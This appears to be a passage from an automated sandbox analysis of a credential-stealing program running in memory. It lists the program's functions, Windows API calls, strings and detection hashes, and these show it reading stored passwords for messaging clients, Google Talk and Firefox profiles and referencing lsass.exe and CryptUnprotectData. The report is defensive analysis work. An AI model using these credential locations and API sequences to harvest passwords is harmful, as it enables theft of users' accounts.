        control_flow_graph 294 40da79-40daaf call 40fd01 297 40dab2-40dab5 294->297 298 40dae7-40daeb 297->298 299 40dab7-40dacf RegOpenKeyExA 297->299 300 40db0c-40db13 call 40ff88 298->300 301 40daed-40db05 RegOpenKeyExA 298->301 302 40dad1 299->302 303 40dae3-40dae5 299->303 305 40db18-40db1a 300->305 301->303 306 40db07-40db0a 301->306 304 40dad4-40dae1 call 40fe5d 302->304 303->305 304->305 309 40db1c-40db6c call 406958 * 2 305->309 310 40db6e-40db75 305->310 306->304 309->310 310->297 312 40db7b-40db93 RegOpenKeyExA 310->312 314 40dbb1 312->314 315 40db95-40dbaf call 40fd2e 312->315 318 40dbb3-40dbb5 314->318 315->318 321 40dc11-40dc29 RegOpenKeyExA 318->321 322 40dbb7-40dc0f call 406958 * 2 318->322 324 40dc47 321->324 325 40dc2b-40dc45 call 40fd2e 321->325 322->321 329 40dc49-40dc4b 324->329 325->329 332 40dca2-40dccd call 4103f1 call 410205 329->332 333 40dc4d-40dca0 call 406958 * 2 329->333 345 40dcd8-40dcef call 404ce0 * 2 332->345 346 40dccf-40dcd3 call 410383 332->346 333->332 346->345
        APIs
          • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
          • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040DACB
          • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
          • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
          • Part of subcall function 0040FF88: LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DB01
        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?,?), ref: 0040DB8F
        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DC25
        Strings
        • UserMicrosoft RTC Instant Messaging, xrefs: 0040DBA5
        • Software\Microsoft\MessengerService, xrefs: 0040DAF7, 0040DB85, 0040DC1B
        • Software\Microsoft\MSNMessenger, xrefs: 0040DAC1
        • UserMicrosoft Exchange Instant Messaging, xrefs: 0040DC3B
        • PasswordMicrosoft Exchange Instant Messaging, xrefs: 0040DC36
        • PasswordMicrosoft RTC Instant Messaging, xrefs: 0040DBA0
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Open$ByteCharMultiWidememset$FreeLocal
        • String ID: PasswordMicrosoft Exchange Instant Messaging$PasswordMicrosoft RTC Instant Messaging$Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService$UserMicrosoft Exchange Instant Messaging$UserMicrosoft RTC Instant Messaging
        • API String ID: 3472595403-3472580514
        • Opcode ID: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
        • Instruction ID: 22d36e33a130c3ca974138f2eaaf9dbe6720f3348f6af52b077c8fd119907347
        • Opcode Fuzzy Hash: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
        • Instruction Fuzzy Hash: CD711BB1D0025DAFDB10DFD5CD84AEEBBB8AB48309F5000BBE505B6241D7786A898B58
        Function 0040BBF0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82stringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 353 40bbf0-40bc3e memset GetModuleFileNameA strrchr 354 40bc40 353->354 355 40bc43-40bcb8 _mbscat _mbscpy * 2 call 4039a8 353->355 354->355 358 40bcd4-40bcf2 355->358 359 40bcba-40bcc2 355->359 362 40bcf4 call 402d81 358->362 363 40bcf9-40bd0e call 40946f 358->363 359->358 360 40bcc4-40bcce GetWindowPlacement 359->360 360->358 362->363
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
        • String ID: .cfg$General$WinPos
        • API String ID: 1012775001-3165880290
        • Opcode ID: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
        • Instruction ID: 4d3526ff516950935d38684931a8ffa2e994efc3bce567aa6e3141678cacb11c
        • Opcode Fuzzy Hash: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
        • Instruction Fuzzy Hash: AC31B4729042189BDB11DB55DC45BCA77BC9F58704F0400FAE948AB282DBB45FC58FA8
        Function 004039A8 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 89COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 384 4039a8-403a0f call 40d339 call 40d725 392 403a14-403a47 memset sprintf 384->392 393 403a49-403a6a call 40d362 * 2 _strcmpi 392->393 394 403a7c-403aa4 call 40d362 * 2 call 411ec1 392->394 393->394 403 403a6c-403a7a 393->403 404 403aa7-403aab 394->404 403->404 404->392 405 403ab1-403ab3 404->405
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _strcmpimemsetsprintf
        • String ID: AddExportHeaderLine$Folder%d$MarkOddEvenRows$SaveFilterIndex$ShowGridLines
        • API String ID: 1148023869-3238971583
        • Opcode ID: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
        • Instruction ID: b4f0ac16e309dff731b59d997bf236358cc0e702142a5422807362b934f22301
        • Opcode Fuzzy Hash: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
        • Instruction Fuzzy Hash: A22143717041046BCB19DFA8CC86FAAB7F8BF08705F14446EB44A97181EA78AE848B59
        Function 0040FA34 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98stringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 408 40fa34-40fa56 call 40731c call 40fc4f 413 40fb5b-40fb67 call 40733e 408->413 414 40fa5c-40fa61 408->414 415 40fa66-40faa3 memset call 407455 strlen * 2 414->415 420 40faa5-40fab6 call 406b4b 415->420 421 40fab8 415->421 423 40fabf-40face call 4069d3 420->423 421->423 427 40fad0-40fadc call 407364 423->427 428 40fae1-40fb0a call 407455 strlen * 2 423->428 427->428 432 40fb23 428->432 433 40fb0c-40fb21 call 406b4b 428->433 435 40fb2a-40fb39 call 4069d3 432->435 433->435 439 40fb3b-40fb47 call 407364 435->439 440 40fb4c-40fb55 435->440 439->440 440->413 440->415
        APIs
          • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC6B
          • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC82
          • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCAD
          • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCD5
        • memset.MSVCRT ref: 0040FA77
        • strlen.MSVCRT ref: 0040FA8E
        • strlen.MSVCRT ref: 0040FA97
        • strlen.MSVCRT ref: 0040FAF0
        • strlen.MSVCRT ref: 0040FAFE
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$_mbscatmemset$_mbscpy
        • String ID: history.dat$places.sqlite
        • API String ID: 29466866-467022611
        • Opcode ID: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
        • Instruction ID: 51ac12969def4fbc614ccf7375ed6982ef447687ff00d0a07234f36c10d15357
        • Opcode Fuzzy Hash: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
        • Instruction Fuzzy Hash: 7A313271D05118ABDB10EBA5DC85BDDBBB89F01319F1044BBE514F2181DB38AB89CB59
        Function 004043E4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 442 4043e4-404427 memset 443 404436-404457 _mbscpy call 40680e call 4028e7 442->443 444 404429-404431 GetSystemDirectoryA 442->444 449 404480-40449e call 406efe call 411147 call 411560 443->449 450 404459-40447c 443->450 444->443 456 4044a3-4044aa 449->456 450->449 457 4044d7 456->457 458 4044ac-4044cb memcpy 456->458 460 4044d9-4044dd 457->460 458->457 459 4044cd-4044d5 458->459 459->457 459->460
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: DirectorySystem_mbscpymemcpymemset
        • String ID: hA$lsass.exe
        • API String ID: 3651535325-1783533361
        • Opcode ID: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
        • Instruction ID: 0e5f66d5a96f37e034b058b5e8cd5d15c838e509caf2427c45d960fa31638fa3
        • Opcode Fuzzy Hash: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
        • Instruction Fuzzy Hash: 23213671C04298B9EB10DBB9EC057CEBF789B04308F0484BAD644A7191C7B98B88C7A9
        Function 0040FC4F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040FC6B
        • memset.MSVCRT ref: 0040FC82
          • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
          • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
        • _mbscat.MSVCRT ref: 0040FCAD
          • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
          • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
          • Part of subcall function 0041223F: _mbscpy.MSVCRT ref: 0041230C
        • _mbscat.MSVCRT ref: 0040FCD5
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _mbscatmemset$Close_mbscpystrlen
        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
        • API String ID: 3071782539-1174173950
        • Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
        • Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
        • Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
        • Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9
        Function 004085B9 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
          • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800), ref: 00408661
        • _wcslwr.MSVCRT ref: 0040866E
        • wcslen.MSVCRT ref: 0040868B
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??3@$ByteCharMultiWide_wcslwrwcslen
        • String ID: /$/
        • API String ID: 2365529402-2523464752
        • Opcode ID: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
        • Instruction ID: 2a8444091b22e9eb4757945b889b84cf8c338ceadb4b858a9340bcb8d8787785
        • Opcode Fuzzy Hash: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
        • Instruction Fuzzy Hash: 5131A271500109EBDB11EF95CD819EEB3A8BF04345F10857EF585B3280DB78AE858BA8
        Function 00407F7E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78registryCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CDB
          • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CEF
          • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D09
          • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D1E
          • Part of subcall function 00407C79: GetComputerNameA.KERNEL32(?,?), ref: 00407D40
          • Part of subcall function 00407C79: GetUserNameA.ADVAPI32(?,?), ref: 00407D54
          • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
          • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
          • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407D91
          • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407DA0
          • Part of subcall function 00407C79: memcpy.MSVCRT ref: 00407DB2
          • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
        • memset.MSVCRT ref: 00407FCC
          • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
        • memset.MSVCRT ref: 00408019
        • RegCloseKey.ADVAPI32(000000FF,?,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 00408050
        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000FF), ref: 00408075
        Strings
        • Software\Google\Google Talk\Accounts, xrefs: 00407F99
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
        • String ID: Software\Google\Google Talk\Accounts
        • API String ID: 2959138223-1079885057
        • Opcode ID: 29dbe836aef6fa5013a9611a43396d8c0875219e8056679997d98ea8c5a25880
        • Instruction ID: d1f993f4292481421df56ff24d775a8bf39926e587c7cc16b4fa812e835a0406
        • Opcode Fuzzy Hash: 29dbe836aef6fa5013a9611a43396d8c0875219e8056679997d98ea8c5a25880
        • Instruction Fuzzy Hash: CC2131B1D0511DBADF21AB95DD42EEEBB7CAF04744F0000B6FA08B1151E7355B94CBA5
        Function 0041223F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00412192: LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
          • Part of subcall function 00412192: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
        • memset.MSVCRT ref: 00412297
        • RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
        • _mbscpy.MSVCRT ref: 0041230C
          • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
        Strings
        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122B2, 004122C2
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
        • API String ID: 889583718-2036018995
        • Opcode ID: 92230320118305b7d937a1f0dac2dfc09aaee06fc800f8ac7fa9974061941b41
        • Instruction ID: 8ee396e5f1da91aaa9319efae8cdfa2544b6f7efa6ef91eb3d4b19fa56f42788
        • Opcode Fuzzy Hash: 92230320118305b7d937a1f0dac2dfc09aaee06fc800f8ac7fa9974061941b41
        • Instruction Fuzzy Hash: 7011DB71800215BBDB24A6985D4A9EE77BCDB05304F1000EBED51F2152D6B89EE4C69E
        Function 00411560 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 004115A1
        • K32EnumProcesses.KERNEL32(?,00004000,004044A3,?,004044A3,?,00000000,00000000,00000000), ref: 004115B9
          • Part of subcall function 004112D9: OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
          • Part of subcall function 004112D9: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
          • Part of subcall function 004112D9: K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
          • Part of subcall function 004112D9: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336
          • Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198
          • Part of subcall function 0041172B: memcpy.MSVCRT ref: 00411758
        • _mbscpy.MSVCRT ref: 0041165E
        • CloseHandle.KERNEL32(00000000,004044A3,?), ref: 00411697
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: CloseEnumProcess_mbscpy$ChangeFileFindHandleModuleModulesNameNotificationOpenProcessesmemcpymemset
        • String ID:
        • API String ID: 3551507631-0
        • Opcode ID: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
        • Instruction ID: 5e40a2ef1ff72a785ccc601064cd9551f1045985186162b7752f8c4c90acf24d
        • Opcode Fuzzy Hash: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
        • Instruction Fuzzy Hash: 72317271901129ABDB20EB65DC85BEE77BCEB44344F0440ABE709E2160D7759EC5CA68
        Function 00411C8F Relevance: 6.1, APIs: 4, Instructions: 58COMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 00411CB8
          • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
          • Part of subcall function 00406F2D: memcpy.MSVCRT ref: 00406F78
        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
        • memset.MSVCRT ref: 00411CF4
        • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: PrivateProfileStringmemset$Writememcpysprintf
        • String ID:
        • API String ID: 3143880245-0
        • Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
        • Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
        • Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
        • Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8
        Function 00404220 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
        • GetFileSize.KERNEL32(00000000,00000000), ref: 00404241
        • ??2@YAPAXI@Z.MSVCRT ref: 00404257
          • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
        • ??3@YAXPAX@Z.MSVCRT ref: 00404291
        • CloseHandle.KERNEL32(?), ref: 0040429A
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: File$??2@??3@CloseCreateHandleReadSize
        • String ID:
        • API String ID: 1968906679-0
        • Opcode ID: a2088bb8b873d4b09a99b72ff45e45ed8d7905610cb4390c4bc1171379a6186b
        • Instruction ID: a1f592bc07a1c6bae19e5ae82b96cf667b255c71c14e9b40cb31a6e8a4c88875
        • Opcode Fuzzy Hash: a2088bb8b873d4b09a99b72ff45e45ed8d7905610cb4390c4bc1171379a6186b
        • Instruction Fuzzy Hash: F801A1B2501118BBD710AA65EC45EDF776CEB853B4F10823EFD15E62D0EB389E0086A8
        Function 004112D9 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
        Download Yara Rule
        APIs
        • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
        • K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Process$ChangeCloseEnumFileFindModuleModulesNameNotificationOpen
        • String ID:
        • API String ID: 1149579341-0
        • Opcode ID: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
        • Instruction ID: d3b8bc427d879abbe067d139e4d8751d61c0b56586969d320d8ec49f77c75a5b
        • Opcode Fuzzy Hash: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
        • Instruction Fuzzy Hash: 0A01DF36200109BFFB105FA29D84AEBBBACEB44784B04003AFF12D05A0D779DC81822D
        Function 004140F2 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??3@
        • String ID:
        • API String ID: 613200358-0
        • Opcode ID: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
        • Instruction ID: 5397eece0a1688dd905253f83ef07836dc4e260be7ec153caf65aeba5f13d1a3
        • Opcode Fuzzy Hash: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
        • Instruction Fuzzy Hash: 82E04674308210269A24AF3BFE49AC723AC5B54725794852FF808D33A2CE2CCCC0802C
        Function 0040D935 Relevance: 4.5, APIs: 3, Instructions: 46COMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040D959
        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
        • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989
          • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
          • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925
          • Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
          • Part of subcall function 0040D794: atoi.MSVCRT ref: 0040D840
          • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
          • Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8B3
          • Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8C6
          • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
        • String ID:
        • API String ID: 2578913611-0
        • Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
        • Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
        • Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
        • Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4
        Function 00410383 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
        • _mbscpy.MSVCRT ref: 004103C3
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Version_mbscpy
        • String ID: CryptUnprotectData
        • API String ID: 1856898028-1975210251
        • Opcode ID: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
        • Instruction ID: 124ef79401bdf720cf005998ce1259a6424ffa61298b62e05562ee11dac58942
        • Opcode Fuzzy Hash: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
        • Instruction Fuzzy Hash: D0F0A471A0030C9BCF04EBA9D589ADEBBB85F08318F11802FE910B6181D7B8D4C4CB2E
        Function 0040C5A4 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 68COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _strcmpi
        • String ID: /stext
        • API String ID: 1439213657-3817206916
        • Opcode ID: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
        • Instruction ID: 4d1f9c46abbdb5e83ce0205fdf3861872a59254e2367a1e2376026c6f9217911
        • Opcode Fuzzy Hash: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
        • Instruction Fuzzy Hash: D721A130614211EFC36C9F2988C1966B3A9BF05314B1556BFB40AA7382DB79EC519BC8
        Function 004042AA Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 67COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0040783B: strlen.MSVCRT ref: 00407862
          • Part of subcall function 0040783B: strlen.MSVCRT ref: 0040786F
          • Part of subcall function 00407898: FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
          • Part of subcall function 00407898: strlen.MSVCRT ref: 004078FC
          • Part of subcall function 00407898: strlen.MSVCRT ref: 00407904
        • _strnicmp.MSVCRT ref: 0040431A
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$FileFindFirst_strnicmp
        • String ID: credentials
        • API String ID: 773473087-4194641934
        • Opcode ID: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
        • Instruction ID: 0f17e4e4efe03dbe37520bfce116898ea2601fe450b4b80a5694618c7f7ee9f5
        • Opcode Fuzzy Hash: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
        • Instruction Fuzzy Hash: 4E21D872A0421C56DB60F6668C417DB77A85F81349F4460FBAE18F21C2EA78DF84CF55
        Function 0040E675 Relevance: 3.0, APIs: 2, Instructions: 48stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040E695
